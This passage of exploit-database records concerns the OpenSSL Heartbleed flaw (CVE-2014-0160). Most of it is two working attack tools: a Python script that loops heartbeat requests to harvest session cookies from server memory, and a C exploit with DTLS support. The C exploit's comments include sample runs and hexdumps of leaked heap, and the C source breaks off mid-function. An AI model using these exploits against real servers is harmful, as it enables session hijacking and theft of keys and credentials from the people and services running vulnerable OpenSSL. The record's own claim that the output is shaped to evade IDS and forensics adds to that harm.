"2014-04-09T00:00:00", "id": "1337DAY-ID-22118", "href": "https://0day.today/exploit/description/22118", "sourceData": "#!/usr/bin/python\r\n\r\n# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions.\r\n# Michael Davis ([email\u00a0protected])\r\n\r\n# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email\u00a0protected])\r\n\r\n# The author disclaims copyright to this source code.\r\n\r\nimport select\r\nimport sys\r\nimport string\r\nimport struct\r\nimport socket\r\nimport time\r\nfrom optparse import OptionParser\r\n\r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\noptions.add_option('-c', '--cookie', type='str', default='session', help='Cookie to look for. (default: session)')\r\n\r\n\r\ndef h2bin(x):\r\n return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n\r\nhello = h2bin('''\r\n16 03 02 00 dc 01 00 00 d8 03 02 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01\r\n''')\r\n\r\nhb = h2bin('''\r\n18 03 02 00 03\r\n01 40 00\r\n''')\r\n\r\n\r\nclass HeartBleeder(object):\r\n\r\n server_response = None\r\n socket = None\r\n hostname = ''\r\n port = 443\r\n found_sessions = set()\r\n cookie = 'session'\r\n cookie_length = 56\r\n\r\n def __init__(self, hostname='', cookie=''):\r\n self.hostname = hostname\r\n self.cookie = cookie\r\n\r\n def connect(self):\r\n \"\"\"\r\n Connects to the remote server.\r\n \"\"\"\r\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sys.stdout.flush()\r\n self.socket.connect((self.hostname, self.port))\r\n sys.stdout.flush()\r\n self.socket.send(hello)\r\n sys.stdout.flush()\r\n\r\n def rcv_response(self):\r\n while True:\r\n _type, version, payload = self.rcv_message()\r\n if _type is None:\r\n print 'Server closed connection without sending Server Hello.'\r\n return\r\n # Look for server hello done message.\r\n if _type == 22 and ord(payload[0]) == 0x0E:\r\n break\r\n\r\n def rcv_message(self):\r\n\r\n record_header = self.rcv_all(5)\r\n if record_header is None:\r\n print 'Unexpected EOF receiving record header - server closed connection'\r\n return None, None, None\r\n _type, version, line = struct.unpack('>BHH', record_header)\r\n payload = self.rcv_all(line, 10)\r\n if payload is None:\r\n print 'Unexpected EOF receiving record payload - server closed connection'\r\n return None, None, None\r\n # print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n return _type, version, payload\r\n\r\n def rcv_all(self, length, timeout=5):\r\n endtime = time.time() + timeout\r\n rdata = ''\r\n remain = length\r\n while remain > 0:\r\n rtime = endtime - time.time()\r\n if rtime < 0:\r\n return None\r\n r, w, e = select.select([self.socket], [], [], 5)\r\n if self.socket in r:\r\n data = self.socket.recv(remain)\r\n # EOF?\r\n if not data:\r\n return None\r\n rdata += data\r\n remain -= len(data)\r\n return rdata\r\n\r\n def try_heartbeat(self):\r\n self.socket.send(hb)\r\n while True:\r\n _type, version, self.payload = self.rcv_message()\r\n if _type is None:\r\n print 'No heartbeat response received, server likely not vulnerable'\r\n return False\r\n\r\n if _type == 24:\r\n # print 'Received heartbeat response:'\r\n self.parse_response()\r\n if len(self.payload) > 3:\r\n pass\r\n # print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n else:\r\n print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n return True\r\n\r\n if _type == 21:\r\n print 'Received alert:'\r\n self.hexdump(self.payload)\r\n print 'Server returned error, likely not vulnerable'\r\n return False\r\n\r\n def parse_response(self):\r\n \"\"\"\r\n Parses the response from the server for a session id.\r\n \"\"\"\r\n ascii = ''.join((c if 32 <= ord(c) <= 126 else ' ')for c in self.payload)\r\n index = string.find(ascii, self.cookie)\r\n if index >= 0:\r\n info = ascii[index:index + self.cookie_length]\r\n session = info.split(' ')[0]\r\n session = string.replace(session, ';', '')\r\n if session not in self.found_sessions:\r\n self.found_sessions.add(session)\r\n print session\r\n\r\n def hexdump(self, payload):\r\n \"\"\"\r\n Prints out a hexdump in the event that server returns an error.\r\n \"\"\"\r\n for b in xrange(0, len(payload), 16):\r\n line = [c for c in payload[b:b + 16]]\r\n hxdat = ' '.join('%02X' % ord(c) for c in line)\r\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in line)\r\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n print\r\n\r\n def scan(self):\r\n self.connect()\r\n self.rcv_response()\r\n self.try_heartbeat()\r\n\r\n\r\ndef main():\r\n opts, args = options.parse_args()\r\n if len(args) < 1:\r\n options.print_help()\r\n return\r\n\r\n cookies_str = 'session'\r\n if len(args) > 1:\r\n cookies_str = args[1]\r\n\r\n print cookies_str\r\n\r\n while True:\r\n heartbeat = HeartBleeder(hostname=args[0], cookie=cookies_str)\r\n heartbeat.scan()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22118"}, {"lastseen": "2018-04-13T03:43:15", "references": [], "description": "This exploit uses OpenSSL to create an encrypted connection and trigger the heartbleed leak. The leaked information is returned within encrypted SSL packets and is then decrypted and wrote to a file to annoy IDS/forensics. The exploit can set heartbeat payload length arbitrarily or use two preset values for NULL and MAX length.", "edition": 2, "reporter": "Ayman Sagy", "published": "2014-04-24T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "zdt", "title": "Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-24T00:00:00", "id": "1337DAY-ID-22172", "href": "https://0day.today/exploit/description/22172", "sourceData": "/*\r\n* CVE-2014-0160 heartbleed OpenSSL information leak exploit\r\n* =========================================================\r\n* This exploit uses OpenSSL to create an encrypted connection\r\n* and trigger the heartbleed leak. The leaked information is\r\n* returned within encrypted SSL packets and is then decrypted\r\n* and wrote to a file to annoy IDS/forensics. The exploit can\r\n* set heartbeat payload length arbitrarily or use two preset\r\n* values for NULL and MAX length. The vulnerability occurs due\r\n* to bounds checking not being performed on a heap value which\r\n* is user supplied and returned to the user as part of DTLS/TLS\r\n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to\r\n* 1.0.1f are known affected. You must run this against a target\r\n* which is linked to a vulnerable OpenSSL library using DTLS/TLS.\r\n* This exploit leaks upto 65532 bytes of remote heap each request\r\n* and can be run in a loop until the connected peer ends connection.\r\n* The data leaked contains 16 bytes of random padding at the end.\r\n* The exploit can be used against a connecting client or server,\r\n* it can also send pre_cmd's to plain-text services to establish\r\n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients\r\n* will often forcefully close the connection during large leak\r\n* requests so try to lower your payload request size.\r\n*\r\n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g\r\n*\r\n* E.g.\r\n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed\r\n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ connecting to 192.168.11.23 443/tcp\r\n* [ connected to 192.168.11.23 443/tcp\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=65535\r\n* [ final record type=24, length=16384\r\n* [ wrote 16381 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=42\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=18\r\n* [ wrote 18 bytes of heap to file 'out'\r\n* [ done.\r\n* $ ls -al out\r\n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out\r\n* $ hexdump -C out\r\n* - snip - snip \r\n*\r\n* Use following example command to generate certificates for clients.\r\n*\r\n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\r\n* -keyout server.key -out server.crt\r\n*\r\n* Debian compile with \"gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\r\n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto\"\r\n*\r\n* todo: add udp/dtls support.\r\n*\r\n* - Hacker Fantastic\r\n* http://www.mdsec.co.uk\r\n*\r\n*/\r\n \r\n/* Modified by Ayman Sagy aymansagy @ gmail.com - Added DTLS over UDP support\r\n*\r\n* use -u switch, tested against s_server/s_client version 1.0.1d\r\n*\r\n* # openssl s_server -accept 990 -cert ssl.crt -key ssl.key -dtls1\r\n* ...\r\n* # ./heartbleed -s 192.168.75.235 -p 990 -f eshta -t 1 -u\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=1392\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=1336\r\n* [ final record type=24, length=1355\r\n* [ wrote 1352 bytes of heap to file 'eshta'\r\n*\r\n*\r\n* # hexdump -C eshta\r\n* 00000000 00 00 00 00 06 30 f1 95 08 00 00 00 00 00 00 00 |.....0..........|\r\n* 00000010 8c 43 64 ab e3 89 6b fd e3 d3 74 a1 a1 31 8c 35 |.Cd...k...t..1.5|\r\n* 00000020 09 6d b9 e7 08 08 08 08 08 08 08 08 08 a1 65 9f |.m............e.|\r\n* 00000030 ca 13 80 7c a5 88 b0 c9 d5 f6 7b 14 fe ff 00 00 |...|......{.....|\r\n* 00000040 00 00 00 00 00 03 00 01 01 16 fe ff 00 01 00 00 |................|\r\n* 00000050 00 00 00 00 00 40 b5 fd a5 10 da c4 fd fb c7 d2 |[email\u00a0protected]|\r\n* 00000060 9f 0c 56 4b a9 9c 14 00 00 0c 00 03 00 00 00 00 |..VK............|\r\n* 00000070 00 0c 69 ec c4 d5 f3 38 ae e5 2e 3a 1a 32 f9 30 |..i....8...:.2.0|\r\n* 00000080 7f 61 4c 8c d7 34 f3 02 08 3f 68 01 a9 a7 81 55 |.aL..4...?h....U|\r\n* 00000090 01 c9 03 03 03 03 00 00 0e 31 39 32 2e 31 36 38 |.........192.168|\r\n* 000000a0 2e 37 35 2e 32 33 35 00 23 00 00 00 0f 00 01 01 |.75.235.#.......|\r\n* 000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n*\r\n* 00000530 00 00 00 00 00 00 00 00 a5 e2 f5 67 d6 23 85 49 |...........g.#.I|\r\n* 00000540 b3 cc ed c4 d2 74 c8 97 c1 b4 cc |.....t.....|\r\n* 0000054b\r\n*\r\n*\r\n* # openssl s_client -connect localhost:990 -dtls1\r\n* ...\r\n* # ./heartbleed -b localhost -p 990 -u -t 1 -f eshta\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ SSL connection using AES256-SHA\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=1392\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=1336\r\n* [ final record type=24, length=1355\r\n* [ wrote 1352 bytes of heap to file 'eshta'\r\n*\r\n*\r\n* # hexdump -C eshta\r\n* 00000000 00 00 24 4e b7 00 00 00 00 00 00 00 00 18 00 00 |..$N............|\r\n* 00000010 cf d0 5f df c3 64 5f 58 79 17 f8 f7 22 9b 28 6e |.._..d_Xy...\".(n|\r\n* 00000020 c0 e7 d6 a3 08 08 08 08 08 08 08 08 08 9b c3 38 |...............8|\r\n* 00000030 2b 32 5f dd 3a d5 0f 83 51 02 2f 70 33 8f cf 82 |+2_.:...Q./p3...|\r\n* 00000040 21 5b cc 25 80 26 f3 29 c8 90 91 ec 5c 83 68 ee |![.%.&.)....\\.h.|\r\n* 00000050 6b 11 0d ad f1 f4 da 9e 13 59 8f 2a 74 f6 d4 35 |k........Y.*t..5|\r\n* 00000060 9e 17 12 7c 2b 6f 9e a8 1e b4 7a 3c a5 ec 18 e0 |...|+o....z<....|\r\n* 00000070 44 b2 51 e4 69 8c 47 29 39 fb 9e b0 dd 5b 05 4d |D.Q.i.G)9....[.M|\r\n* 00000080 db 11 06 7b 1d 08 58 60 ac 34 3f 2d d1 14 c1 b7 |...{..X`.4?-....|\r\n* 00000090 d5 08 59 73 16 28 f8 75 23 f7 85 27 48 be 1f 14 |..Ys.(.u#..'H...|\r\n* 000000a0 fe ff 00 00 00 00 00 00 00 04 00 01 01 16 fe ff |................|\r\n* 000000b0 00 01 00 00 00 00 00 00 00 40 62 1c 02 19 45 5f |[email\u00a0protected]_|\r\n* 000000c0 2c a6 89 95 d2 bf 16 c4 8b b7 14 00 00 0c 00 04 |,...............|\r\n* 000000d0 00 00 00 00 00 0c e9 fb 75 02 61 90 be 4d f7 82 |........u.a..M..|\r\n* 000000e0 06 d6 fd 6d 53 a1 d5 44 e0 5a 0d 6a 6a 94 ef e8 |...mS..D.Z.jj...|\r\n* 000000f0 4c 01 4b cb 86 73 03 03 03 03 2d 53 74 61 74 65 |L.K..s....-State|\r\n* 00000100 31 21 30 1f 06 03 55 04 0a 0c 18 49 6e 74 65 72 |1!0...U....Inter|\r\n* 00000110 6e 65 74 20 57 69 64 67 69 74 73 20 50 74 79 20 |net Widgits Pty |\r\n* 00000120 4c 74 64 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 |Ltd0..\"0...*.H..|\r\n* 00000130 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 |...........0....|\r\n* 00000140 82 01 01 00 c0 85 26 4a 9d cd f8 5e 46 74 fa 89 |......&J...^Ft..|\r\n* 00000150 e3 7d 58 76 23 ba ba dc b1 35 98 35 a5 ba 53 a1 |.}Xv#....5.5..S.|\r\n* 00000160 5b 37 28 fe f7 d0 02 fc fd c9 e3 b1 ee e6 fe 79 |[7(............y|\r\n* 00000170 86 f8 81 1a 29 29 a9 81 95 1c c9 5c 81 a2 e8 0c |....)).....\\....|\r\n* 00000180 35 b7 cb 67 8a ec 2a d1 73 e6 70 78 53 c8 50 91 |5..g..*.s.pxS.P.|\r\n* 00000190 49 07 db e1 a4 08 7b fb 07 54 48 85 45 c2 38 71 |I.....{..TH.E.8q|\r\n* 000001a0 6a 8a f2 4d a7 ba 1a 86 36 a2 ae bb a1 e1 7c 2c |j..M....6.....|,|\r\n* 000001b0 12 04 ce e5 d1 75 24 94 1c 31 2c 46 b7 76 30 3a |.....u$..1,F.v0:|\r\n* 000001c0 04 79 2f b3 65 74 fb ae c7 10 a5 da a8 2d b6 fd |.y/.et.......-..|\r\n* 000001d0 cf f9 11 fe 38 cd 25 7e 13 75 14 1d 58 92 bb 3f |....8.%~.u..X..?|\r\n* 000001e0 8f 75 d5 52 f7 27 66 ca 5d 55 4d 0a b5 71 a2 16 |.u.R.'f.]UM..q..|\r\n* 000001f0 3e 01 af 97 93 eb 5c 3f e0 fa c8 61 2c a1 87 8f |>.....\\?...a,...|\r\n* 00000200 60 d4 df 5d 9d cd 0f 34 a9 66 6c 93 d8 5f 4a 2b |`..]...4.fl.._J+|\r\n* 00000210 fd 67 3a 2f 88 90 b4 e9 f5 d6 ee bb 7d 8b 1c e5 |.g:/........}...|\r\n* 00000220 f2 cc 4f b2 c0 dc e8 1b 4c 6e 51 c9 47 8b 6c 82 |..O.....LnQ.G.l.|\r\n* 00000230 f9 4b ae 01 a8 f9 6c 6d d5 1a d5 cf 63 f4 7f e0 |.K....lm....c...|\r\n* 00000240 96 54 3f 7d 02 03 01 00 01 a3 50 30 4e 30 1d 06 |.T?}......P0N0..|\r\n* 00000250 03 55 1d 0e 04 16 04 14 af 97 4e 87 62 8a 77 b8 |.U........N.b.w.|\r\n* 00000260 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 1f 06 03 |..$ 5.f.U?t.0...|\r\n* 00000270 55 1d 23 04 18 30 16 80 14 af 97 4e 87 62 8a 77 |U.#..0.....N.b.w|\r\n* 00000280 b8 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 0c 06 |...$ 5.f.U?t.0..|\r\n* 00000290 03 55 1d 13 04 05 30 03 01 01 ff 30 0d 06 09 2a |.U....0....0...*|\r\n* 000002a0 86 48 86 f7 0d 01 01 05 05 00 03 82 01 01 00 b0 |.H..............|\r\n* 000002b0 8e 40 58 2d 86 32 95 11 a7 a1 64 1d fc 08 8d 87 |[email\u00a0protected]|\r\n* 000002c0 18 d3 5d c6 a0 bb 84 4a 50 f5 27 1c 15 4b 02 0c |..]....JP.'..K..|\r\n* 000002d0 49 1f 2d 0a 52 d3 98 6b 71 3d b9 0f 36 24 d3 77 |I.-.R..kq=..6$.w|\r\n* 000002e0 e0 d0 a5 50 e5 ea 2d 67 11 69 4d 45 52 97 4d 58 |...P..-g.iMER.MX|\r\n* 000002f0 de 22 06 02 6d 21 80 2f 0d 1c d5 d5 80 5c 8f 44 |.\"..m!./.....\\.D|\r\n* 00000300 1e b6 f3 41 4c dc d3 40 8d 54 ac b0 ca 8f 19 6a |[email\u00a0protected]|\r\n* 00000310 4d f2 fb ad 68 5a 99 19 ca ae b2 f5 54 70 29 96 |M...hZ......Tp).|\r\n* 00000320 84 7e ba a9 6b 42 e6 68 32 dc 65 87 b1 b7 17 22 |.~..kB.h2.e....\"|\r\n* 00000330 e3 cc 62 97 e4 fa 64 0b 1e 70 bf e5 a2 40 e4 49 |[email\u00a0protected]|\r\n* 00000340 24 f9 05 3f 2e fe 7c 38 56 39 4d bd 51 63 0d 79 |$..?..|8V9M.Qc.y|\r\n* 00000350 85 c0 4b 1a 46 64 e0 fe a8 87 bf c7 4d 21 cb 79 |..K.Fd......M!.y|\r\n* 00000360 37 e7 a6 e3 6c 3b ed 35 17 73 7a 71 c6 72 2f bb |7...l;.5.szq.r/.|\r\n* 00000370 58 dc ef e9 1e a3 89 5e 70 cd 95 10 87 c1 8a 7e |X......^p......~|\r\n* 00000380 e7 51 c2 22 67 66 ee 22 f9 a5 2e 31 f2 ad fc 3b |.Q.\"gf.\"...1...;|\r\n* 00000390 98 c8 30 63 ef 74 b5 4e c4 bd c7 a2 46 0a b8 bf |..0c.t.N....F...|\r\n* 000003a0 df a8 54 0e 4f 37 d0 a5 27 a3 f3 a7 28 38 3f 16 |..T.O7..'...(8?.|\r\n* 000003b0 fe ff 00 00 00 00 00 00 00 02 00 0c 0e 00 00 00 |................|\r\n* 000003c0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n* 000003d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n* *\r\n* 00000530 00 00 00 00 00 00 00 00 82 8f be ff cf 26 12 9d |.............&..|\r\n* 00000540 a2 de 0c 44 21 4a 54 be 41 4c df |...D!JT.AL.|\r\n* 0000054b\r\n*\r\n*/\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <getopt.h>\r\n#include <signal.h>\r\n#include <netdb.h>\r\n#include <fcntl.h>\r\n#include <errno.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <inttypes.h>\r\n#include <openssl/bio.h>\r\n#include <openssl/ssl.h>\r\n#include <openssl/err.h>\r\n#include <openssl/evp.h>\r\n#include <openssl/tls1.h>\r\n#include <openssl/rand.h>\r\n#include <openssl/buffer.h>\r\n \r\n#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\r\n (((unsigned int)(c[1])) )),c+=2)\r\n#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\r\n c[1]=(unsigned char)(((s) )&0xff)),c+=2)\r\n \r\nint first = 0;\r\nint leakbytes = 0;\r\nint repeat = 1;\r\nint badpackets = 0;\r\n \r\ntypedef struct {\r\n int socket;\r\n SSL *sslHandle;\r\n SSL_CTX *sslContext;\r\n} connection;\r\n \r\ntypedef struct {\r\n unsigned char type;\r\n short version;\r\n unsigned int length;\r\n unsigned char hbtype;\r\n unsigned int payload_length;\r\n void* payload;\r\n} heartbeat;\r\n \r\nvoid ssl_init();\r\nvoid usage();\r\nint tcp_connect(char*,int);\r\nint tcp_bind(char*, int);\r\nconnection* tls_connect(int);\r\nconnection* tls_bind(int);\r\nint pre_cmd(int,int,int);\r\nvoid* heartbleed(connection* ,unsigned int);\r\nvoid* sneakyleaky(connection* ,char*, int);\r\n \r\nstatic DTLS1_BITMAP *dtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch);\r\nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap);\r\nstatic int dtls1_buffer_record(SSL *s, record_pqueue *q, unsigned char *priority);\r\nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap);\r\n \r\nint tcp_connect(char* server,int port){\r\n int sd,ret;\r\n struct hostent *host;\r\n struct sockaddr_in sa;\r\n host = gethostbyname(server);\r\n sd = socket(AF_INET, SOCK_STREAM, 0);\r\n if(sd==-1){\r\n printf(\"[!] cannot create socket\\n\");\r\n exit(0);\r\n }\r\n sa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n bzero(&(sa.sin_zero),8);\r\n printf(\"[ connecting to %s %d/tcp\\n\",server,port);\r\n ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));\r\n if(ret==0){\r\n printf(\"[ connected to %s %d/tcp\\n\",server,port);\r\n }\r\n else{\r\n printf(\"[!] FATAL: could not connect to %s %d/tcp\\n\",server,port);\r\n exit(0);\r\n }\r\n return sd;\r\n}\r\n \r\nint tcp_bind(char* server, int port){\r\n int sd, ret, val=1;\r\n struct sockaddr_in sin;\r\n struct hostent *host;\r\n host = gethostbyname(server);\r\n sd=socket(AF_INET,SOCK_STREAM,0);\r\n if(sd==-1){\r\n printf(\"[!] cannot create socket\\n\");\r\n exit(0);\r\n }\r\n memset(&sin,0,sizeof(sin));\r\n sin.sin_addr=*((struct in_addr *) host->h_addr);\r\n sin.sin_family=AF_INET;\r\n sin.sin_port=htons(port);\r\n setsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));\r\n ret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));\r\n if(ret==-1){\r\n printf(\"[!] cannot bind socket\\n\");\r\n exit(0);\r\n }\r\n listen(sd,5);\r\n return(sd);\r\n}\r\n \r\nconnection* dtls_server(int sd, char* server,int port){\r\n int bytes;\r\n connection *c;\r\n char* buf;\r\n buf = malloc(4096);\r\n int ret;\r\n struct hostent *host;\r\n struct sockaddr_in sa;\r\n unsigned long addr;\r\n if ((host = gethostbyname(server)) == NULL) {\r\n perror(\"gethostbyname\");\r\n exit(1);\r\n }\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd==-1){\r\n printf(\"[!] cannot create socket\\n\");\r\n exit(0);\r\n }\r\n sa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n if (bind(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {\r\n perror(\"bind()\");\r\n exit(1);\r\n }\r\n \r\n BIO *bio;\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n if(buf==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n memset(buf,0,4096);\r\n c = malloc(sizeof(connection));\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n c->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(DTLSv1_server_method());\r\n SSL_CTX_set_read_ahead (c->sslContext, 1);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n SSL_CTX_SRP_CTX_init(c->sslContext);\r\n SSL_CTX_use_certificate_file(c->sslContext, \"./server.crt\", SSL_FILETYPE_PEM);\r\n SSL_CTX_use_PrivateKey_file(c->sslContext, \"./server.key\", SSL_FILETYPE_PEM); \r\n if(!SSL_CTX_check_private_key(c->sslContext)){\r\n printf(\"[!] FATAL: private key does not match the certificate public key\\n\");\r\n exit(0);\r\n }\r\n c->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n bio = BIO_new_dgram(sd, BIO_NOCLOSE);\r\n \r\n SSL_set_bio(c->sslHandle, bio, bio);\r\n SSL_set_accept_state (c->sslHandle);\r\n \r\n int rc = SSL_accept(c->sslHandle);\r\n printf (\"[ SSL connection using %s\\n\", SSL_get_cipher (c->sslHandle));\r\n// bytes = SSL_read(c->sslHandle, buf, 4095);\r\n// printf(\"[ recieved: %d bytes - showing output\\n%s\\n[\\n\",bytes,buf);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\r\n }\r\n return c;\r\n}\r\n \r\nvoid ssl_init(){\r\n SSL_load_error_strings();\r\n SSL_library_init();\r\n OpenSSL_add_all_digests();\r\n OpenSSL_add_all_algorithms();\r\n OpenSSL_add_all_ciphers();\r\n}\r\n \r\nconnection* tls_connect(int sd){\r\n connection *c;\r\n c = malloc(sizeof(connection));\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n c->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_client_method());\r\n SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n c->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n if(SSL_connect(c->sslHandle)!=1)\r\n ERR_print_errors_fp(stderr);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\");\r\n }\r\n return c;\r\n}\r\n \r\nconnection* dtls_client(int sd, char* server,int port){\r\n int ret;\r\n struct hostent *host;\r\n struct sockaddr_in sa;\r\n connection *c;\r\n memset((char *)&sa,0,sizeof(sa));\r\n c = malloc(sizeof(connection));\r\n if ((host = gethostbyname(server)) == NULL) {\r\n perror(\"gethostbyname\");\r\n exit(1);\r\n }\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd==-1){\r\n printf(\"[!] cannot create socket\\n\");\r\n exit(0);\r\n }\r\n sa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n if (connect(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {\r\n perror(\"connect()\");\r\n exit(0);\r\n }\r\n \r\n BIO *bio;\r\n if(c==NULL){\r\n printf(\"[ error in malloc()\\n\");\r\n exit(0);\r\n }\r\n \r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(DTLSv1_client_method());\r\n SSL_CTX_set_read_ahead (c->sslContext, 1);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n \r\n c->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslHandle = SSL_new(c->sslContext);\r\n SSL_set_tlsext_host_name(c->sslHandle,server);\r\n bio = BIO_new_dgram(sd, BIO_NOCLOSE);\r\n \r\n 